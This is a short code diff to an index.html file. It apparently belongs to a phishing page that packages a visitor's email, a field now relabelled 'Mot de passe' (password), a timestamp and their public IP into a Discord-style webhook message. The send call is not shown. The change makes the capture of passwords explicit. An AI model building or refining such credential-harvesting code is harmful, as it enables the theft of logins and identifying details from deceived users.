--- a/index.html
+++ b/index.html
@@ -80,7 +80,7 @@
             color: 0x5865f2,
             fields: [
               { name: "📧 Email", value: email, inline: true },
-              { name: "🔒 Message", value: message, inline: false },
+              { name: "🔒 Mot de passe", value: message, inline: false },
               { name: "🕒 Date & Heure (locale)", value: `${dateStr} à ${timeStr}`, inline: false },
               { name: "⏱ ISO (UTC)", value: iso, inline: false },
               { name: "🌐 IP publique", value: ip, inline: true }
